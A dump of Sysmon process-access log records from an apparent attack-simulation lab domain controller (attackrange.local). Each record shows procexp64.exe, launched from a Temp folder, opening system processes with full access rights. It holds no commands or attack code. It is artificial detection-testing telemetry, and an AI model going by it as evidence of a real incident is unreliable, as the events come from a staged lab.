15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791384Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791383Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791382Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791381Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791380Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791379Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791378Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791377Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791376Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791375Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791374Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791373Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791372Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791371Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791370Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791369Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791368Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791367Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791366Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791365Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791364Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791363Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791362Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791361Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791360Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791359Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791358Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791357Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791356Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791355Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791354Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791353Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791352Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791351Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791350Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791349Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791348Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791347Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 